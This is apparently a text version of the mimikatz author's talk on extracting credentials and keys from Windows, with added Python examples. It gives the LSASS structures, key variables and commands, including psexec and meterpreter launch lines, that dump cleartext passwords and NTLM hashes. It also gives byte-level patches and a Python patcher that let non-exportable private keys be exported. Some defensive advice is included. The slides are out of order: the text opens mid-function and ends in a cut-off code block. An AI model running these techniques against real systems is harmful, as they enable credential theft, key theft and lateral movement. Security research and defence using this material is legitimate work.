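    return md5_hex(h_a1, nonce, nc, cnonce, qop, h_a2)


@dataclass(frozen=True)
class Challenge:
    """Hypothetical holder for the server's WWW-Authenticate fields."""
    realm: str
    nonce: str
    qop: str = "auth"


def client_answer(username: str, password: str, challenge: Challenge,
                  method: str, uri: str, nc: str, cnonce: str) -> str:
    """Client side: needs username, the server's realm and the password
    (or an HA1 already computed for exactly this realm)."""
    return digest_response(ha1(username, challenge.realm, password),
                           challenge.nonce, nc, cnonce, challenge.qop, ha2(method, uri))


def server_verify(stored_ha1: str, challenge: Challenge, method: str, uri: str,
                  nc: str, cnonce: str, response: str) -> bool:
    """Server side: stores HA1 per realm, so no reversible password is needed there."""
    expected = digest_response(stored_ha1, challenge.nonce, nc, cnonce,
                               challenge.qop, ha2(method, uri))
    return hmac.compare_digest(expected, response)


def realm_changes_ha1(username: str, password: str, realm_a: str, realm_b: str) -> bool:
    """Two servers with different realms need two different HA1 values."""
    return ha1(username, realm_a, password) != ha1(username, realm_b, password)


if __name__ == "__main__":
    ch = Challenge(realm="testrealm@host.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093")
    resp = client_answer("Mufasa", "Circle Of Life", ch, "GET", "/dir/index.html",
                         "00000001", "0a4f113b")
    print("response:", resp)
    print("verified:", server_verify(ha1("Mufasa", ch.realm, "Circle Of Life"), ch,
                                     "GET", "/dir/index.html", "00000001", "0a4f113b", resp))
```

The verification uses a constant-time comparison, and nc/cnonce are part of the hash so a replayed response with a different nonce count fails; both are incidental to the slide's point, which is the realm dependency of HA1.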
mimikatz :: sekurlsa :: wdigest :: theory
This time we know: – that WDigest keeps the password in memory « by protocol » for the HA1 digest – that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protect with LsaProtectMemory)
LsaUnprotectMemory – At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE – Let's perform a search in WDigest – Hypothesis seems verified
LsaProtectMemory – At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE – Let's perform a search in WDigest – SpAcceptCredentials takes the clear password in args • Protect it with LsaProtectMemory • Update or insert data in the double linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID, search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory on Password → password in clear.]
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually I've only used a logical (empirical) approach to search passwords… – Protocol reading – Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.

0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3

0: kd> .reload /user
Loading User Symbols

0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
Output of the trap (kc 5 at each hit of lsasrv!LsaProtectMemory):
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
  ← Our LiveSSP provider!

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
  ← Yeah, Pass the Hash capability with Live account too…

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
  ← Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID, search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory on Password → password in clear.]
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls: – NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable – NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Output of the trap (kc 5 at each hit of lsasrv!LsaProtectMemory):
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  ← Kerberos part for password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID, RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory on Password → password in clear.]
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID, search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory on Password → password in clear.]
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
Ok. It works…
But why?
Not for all logons on NT5 (an unlock may be needed)
From my understanding of Microsoft explanations: – no need of passwords for the Kerberos protocol… – all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…:
– For password auth • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth • No password on client • No hash on client – NTLM hash on client… – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way (they have to be usable).
We used LsaUnprotectMemory in the LSASS context to decrypt them:
- this function relies on LsaEncryptMemory from lsasrv.dll.
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process? Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can load lsasrv.dll too and "imports" the keys that LSASS initialized:
- when we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS.
mimikatz :: sekurlsa :: LsaEncryptMemory (NT5)
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4 (a stream cipher, so any buffer length works)
- DESX (a block cipher, for buffers that are a multiple of its 8-byte block)
[Figure: NT5 key material copied out of LSASS. Inside lsass.exe, lsasrv.dll holds g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8], the DESX CBC feedback). mimikatz loads its own copy of lsasrv.dll and copies these four variables into it ("copy...").]
mimikatz :: sekurlsa :: LsaEncryptMemory (NT6)
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES (for buffers that are a multiple of the 8-byte block)
- AES (in a mode that does not need block alignment, for the other sizes)
[Figure: NT6 key material copied out of LSASS. Inside lsass.exe, lsasrv.dll holds InitializationVector (BYTE[16]) and two BCrypt key handles, h3DesKey and hAesKey. mimikatz copies the IV and follows the two handles down to the key structures below ("copy...").]

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE  data;   /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;   /* "cle" = key */
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages

    Package          Symbols                                   Type
    tspkg            tspkg!TSGlobalCredTable                   RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                     LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList        LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList             LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable      RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList                   LIST_ENTRY
                     lsasrv!LogonSessionListCount              ULONG

Protection Keys

    Key     NT 5 symbols                                   NT 6 symbols
    RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESX    lsasrv!g_pDESXKey, lsasrv!g_Feedback
    3DES                                                   lsasrv!h3DesKey
    AES                                                    lsasrv!hAesKey
    (IV)                                                   lsasrv!InitializationVector
mimikatz :: sekurlsa :: memo
Some commands:

    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonPasswords full
    mimikatz # exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Output of the French-locale build, translated to English (identifiers and hashes as printed):

    mimikatz 1.0 x64 (RC)    /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
    // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Request to ENABLE privilege : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full
    Authentication Id         : 0;234870
    Authentication package    : NTLM
    Primary user              : Gentil Kiwi
    Authentication domain     : vm-w8-rp-x
        msv1_0 :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * LM hash   : d0e9aee149655a6075e4540af1f22d3b
         * NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        wdigest :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        tspkg :
         * User      : Gentil Kiwi
         * Domain    : vm-w8-rp-x
         * Password  : waza1234
        livessp :
         nt (LUID KO)
mimikatz :: sekurlsa - what we can do
Basics:
- No physical access to the computer (the first step to pass-the-hash, then pass-the-pass).
- No admin rights / system rights / debug privileges (...).
- Disable local admin accounts.
- Strong passwords (haha, it was a joke, so useless ;)).
- For privileged accounts, network logon instead of interactive logon (when possible).
- Audit: pass-the-hash leaves traces and can lock accounts.
- No admin rights / system rights / debug privileges, even for VIPs.
- Use a separate network (or forest) for privileged tasks.
More in depth:
- Force strong authentication (SmartCard & Token) $ / €.
- Short validity for Kerberos tickets.
- No delegation.
- Disable NTLM (available with NT6).
- Nothing exotic:
  - biometrics (it keeps the password somewhere and pushes it to Windows);
  - single sign-on.
- Stop shared secrets for authentication, push public/private stuff (like keys ;)).
- Take the opportunities to stop retro-compatibility.
- Disable faulty providers:
  - Is it supported by Microsoft?
  - Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto - what is it?
A little module (mod_mimikatz_crypto) that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys;
- automate the export of certificates/keys, even those which are "not" exportable.
What the crypto module can do:
- List:
  - providers
  - stores
  - certificates
  - keys
- Export:
  - certificates: the public part in DER format, with private keys in PFX format
  - private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch:
  - CryptoAPI, in mimikatz's own context
  - CNG, in LSASS's context (again!)
mimikatz :: crypto - how it's protected
Private keys are DPAPI protected:
- you cannot reuse private key files on another computer, at least not without the master keys and/or the user's password.
A computer/user can load its own keys because it has enough secrets to do it (e.g. an opened session). Yes, a computer/server opens a "session" too.
Export/usage can be limited by:
- a password
- a popup (UI consent prompt)
- the Export/Archive flag not being present
(Password and popup protections are a constraint for most users, and are unavailable for computer keys. The export flag is decided at import time:)

    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, ... (cryptdll.dll, rsaenh.dll, ...).
The process deals with cryptographic keys through this API, inside its own address space...
mimikatz :: crypto :: capi - how it's exported
[Figure: export flow, entirely inside the calling process ("PLAYSKOOL"). The process asks CryptoAPI / the RSA CSP to export a key; the CSP loads the private key (DPAPI decode) and checks the exportable flag: yes -> exported key; no -> NTE_BAD_KEY_STATE.]
mimikatz :: crypto :: patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), the call ends up in rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.
Output of the French-locale build, translated to English:

    mimikatz # crypto::exportCertificates
    Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
     - Benjamin Delpy
        Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportable     : NO
        Key size       : 2048
        Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export  to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

The same key seen by certutil (translated):

    ================ Certificate 0 ================
    Serial Number: 112169417a1c3ef46a301f99385f50680fa0
    Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
    Subject: CN=Benjamin Delpy, C=FR
    Non-root Certificate
    Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
      Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
      Provider = Microsoft Enhanced Cryptographic Provider v1.0
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.

(0x8009000b is NTE_BAD_KEY_STATE: the CSP refused because the key was imported as not exportable.)
mimikatz :: crypto :: patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
The two exportability checks in rsaenh.dll, before (jnz) and after (nop + jmp) the patch:

    .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz   continue_key_export_or_archive
    .text:0AC0B7CB  90                   nop
    .text:0AC0B7CC  E9 33 C7 FF FF       jmp   continue_key_export_or_archive

    .text:0AC1F749  0F 85 B6 3B FF FF    jnz   continue_key_export_or_archive_prepare
    .text:0AC1F749  90                   nop
    .text:0AC1F74A  E9 B6 3B FF FF       jmp   continue_key_export_or_archive_prepare

The rel32 displacement is left untouched: a 1-byte nop followed by a 5-byte jmp rel32 ends at the same address as the 6-byte jnz rel32, so the target is preserved and only the two opcode bytes (0F 85 -> 90 E9) change per site, 4 bytes in total.
mimikatz :: crypto :: patchcapi - demo time
Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi - limitations
Because:
- I'm lazy;
- in the majority of real-life cases I've seen RSA keys (elliptic curve, a little...).
crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll.
mimikatz :: crypto :: cng - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context: the process uses RPC to call the "Key Isolation service" (KeyIso, hosted in LSASS) functions.
It seems more secure than CryptoAPI... It is, but it's not perfect...
mimikatz :: crypto :: cng - how it's exported
[Figure: export flow split across two processes. The process asks CNG to export a key; the request goes over RPC to the KeyIso service (LSASS process), which loads the private key (DPAPI decode) and checks the exportable flag: yes -> exported key; no -> NTE_NOT_SUPPORTED. On NT6, LSASS is a system protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP | SYSTEM_MANDATORY_LABEL_NO_READ_UP), unlike the caller's own "PLAYSKOOL" address space.]
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (KeyIso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.
Output of the French-locale build, translated to English:

    mimikatz # crypto::exportKeys
    [user]
    CNG keys :
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportable  : NO
        Key size    : 2048
        Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.

(0x80090029 is NTE_NOT_SUPPORTED: this time the refusal comes from the KeyIso service, not from a DLL in our own process.)
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
The exportability check in the KeyIso code, before (jnz short) and after (jmp short) the patch; the rel8 displacement is unchanged, so a single opcode byte (75 -> EB) is written:

    .text:6C815210  75 1C    jnz   short continue_key_export
    .text:6C815210  EB 1C    jmp   short continue_key_export
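Both patches (the 6-byte near jnz in rsaenh.dll above, and the 2-byte short jnz in the KeyIso code here) follow one rule: turn the conditional jump into an unconditional one without touching the displacement, because the new jump ends where the old one did. The following Python is an added example, not mimikatz's code and not a patcher for a real process: it applies that rule to byte strings, resolves the jump target before and after to prove it is preserved, and counts the bytes actually rewritten (2 per near site, 1 per short site, matching the "4 bytes" and "1 byte" of the slides). The addresses and opcode bytes come from the slides; the function names are mine.

```python
"""Rewrite an x86 jnz into an unconditional jmp in place, keeping the target.

  near:  0F 85 rel32 (6 bytes) -> 90 E9 rel32 (nop + jmp rel32, same rel32)
  short: 75 rel8     (2 bytes) -> EB rel8     (jmp rel8, same rel8)
Both keep the displacement byte-for-byte: the end of the new jump instruction
is at the same address as the end of the old one, so the target is unchanged.
"""
import struct

JNZ_NEAR = b"\x0f\x85"
JNZ_SHORT = 0x75
JMP_NEAR = 0xE9
JMP_SHORT = 0xEB
NOP = 0x90


def jump_target(code: bytes, offset: int, base: int) -> int:
    """Destination of the jnz/jmp found at `offset` (instruction address = base + offset)."""
    op = code[offset]
    if code[offset:offset + 2] == JNZ_NEAR:
        rel = struct.unpack_from("<i", code, offset + 2)[0]   # signed rel32
        return base + offset + 6 + rel
    if op in (JNZ_SHORT, JMP_SHORT):
        rel = struct.unpack_from("<b", code, offset + 1)[0]   # signed rel8
        return base + offset + 2 + rel
    if op == JMP_NEAR:
        rel = struct.unpack_from("<i", code, offset + 1)[0]
        return base + offset + 5 + rel
    raise ValueError(f"no jnz/jmp encoding at offset {offset:#x}")


def patch_jnz_to_jmp(code: bytes, offset: int) -> bytes:
    """Return a copy of `code` where the jnz at `offset` is made unconditional."""
    buf = bytearray(code)
    if buf[offset:offset + 2] == JNZ_NEAR:
        buf[offset] = NOP            # 0F -> 90
        buf[offset + 1] = JMP_NEAR   # 85 -> E9 ; rel32 bytes untouched
    elif buf[offset] == JNZ_SHORT:
        buf[offset] = JMP_SHORT      # 75 -> EB ; rel8 byte untouched
    else:
        raise ValueError(f"byte(s) at offset {offset:#x} are not a jnz encoding")
    return bytes(buf)


def bytes_changed(original: bytes, patched: bytes) -> int:
    """Number of bytes that actually differ between the two images."""
    return sum(a != b for a, b in zip(original, patched))


if __name__ == "__main__":
    # rsaenh.dll site from the slides: jnz continue_key_export_or_archive
    capi = bytes.fromhex("0f8533c7ffff")
    capi_patched = patch_jnz_to_jmp(capi, 0)
    print(capi_patched.hex(),
          hex(jump_target(capi, 0, 0x0AC0B7CB)),
          hex(jump_target(capi_patched, 1, 0x0AC0B7CB)))   # same target, jmp now at +1
    # KeyIso site from the slides: jnz short continue_key_export
    cng = bytes.fromhex("751c")
    cng_patched = patch_jnz_to_jmp(cng, 0)
    print(cng_patched.hex(), bytes_changed(cng, cng_patched))
```

Run on a full module image rather than a six-byte snippet, the same two functions apply unchanged: the only inputs are the file offset of the jnz and the load address used to print the targets.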
mimikatz :: crypto :: patchcng - demo time
Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng - limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe with other algorithms than RSA).
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates... even those that are exportable (hu?). certutil can...
mimikatz :: crypto :: patchcng - bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports:
- until reboot or a KeyIso service restart.
Some other programs that don't check the export flag before asking for the export can work too:
- yeah, like the good old certutil.
certutil on the same key, before and after crypto::patchcng (French-locale output translated to English):

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Encryption test passed
    CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo
Some commands:

    mimikatz # crypto::patchcapi
    mimikatz # crypto::exportCertificates
    mimikatz # exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

    mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

    mimikatz # privilege::debug
    mimikatz # crypto::patchcng
    mimikatz # crypto::patchcapi
    mimikatz # crypto::exportCertificates
    mimikatz # crypto::exportKeys
    mimikatz # exit

Password:
- the exported PFX files are protected by this password: mimikatz
Keys:
- When you import a certificate multiple times (exportable or not), Windows makes duplicate keys.
- When you delete a certificate, Windows does not delete its private key... funny, isn't it? So yes, mimikatz can export it.
mimikatz :: crypto - what we can do
Exactly the same as for sekurlsa: what prevents access to the accounts and the computer. No admin, no admin, no admin...
Basics:
- Use smartcards/tokens for user certificates.
- Use Hardware Security Modules (HSM), even SoftHSM.
More in depth:
- See what Microsoft can do with the TPM from Windows 8: the Virtual SmartCard seems promising.
- Verify the vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP: their biometrics stuff was a little buggy ;)
mimikatz - what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- AppLocker / SRP bypass
- Driver:
  - play with tokens & privileges
  - display the SSDT (x86 & x64)
  - list minifilters actions
  - list notifications (process, thread, image, registry)
  - list object hooks and procedures
  - ...
- ...
mimikatz - that's all folks
Thanks to / Merci à:
- my girlfriend, for her support (her LSASS crashed a few times);
- the Application Security Forum, for offering me this great opportunity (partners and sponsors for sure);
- Microsoft, for always considering it as normal/acceptable;
- security friends/community, for their ideas & challenges: nagual, newsoft, mubix, ...
- you, for your attention.
Questions?
Don't be shy ;) especially if you have written down the corresponding slide number.
Blog, Source Code & Contact
    blog     : http://blog.gentilkiwi.com
    mimikatz : http://blog.gentilkiwi.com/mimikatz
    source   : https://code.google.com/p/mimikatz
    email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest - what is it?
We speak about hashes, but what hashes?

    H   = MD5(HA1 : nonce : [...] : HA2)
    HA1 = MD5(username : realm : password)
    HA2 = MD5(method : digestURI : [...])

Even after logon, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon.
So the WDigest provider must keep the elements needed to compute responses for different servers:
- username
- realm (from the server)
- password
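To make the slide's point concrete, here is an added Python example (it is not from the slides nor from mimikatz) that computes the Digest values the slide names, following RFC 2617 and using the RFC's own test vector (user "Mufasa", realm "testrealm@host.com", password "Circle Of Life"). It also computes HA1 for the same user and password against two realms: the two digests share nothing, which is why a provider that only stored HA1 for one realm could not answer a challenge from another server, and why WDigest keeps the password itself.

```python
"""RFC 2617 Digest computation, showing why WDigest must keep the password."""
import hashlib


def md5_hex(*parts: str) -> str:
    """MD5 of the colon-joined parts, lowercase hex (the H() / KD() of RFC 2617)."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is chosen by the server."""
    return md5_hex(username, realm, password)


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI), for qop=auth or no qop."""
    return md5_hex(method, digest_uri)


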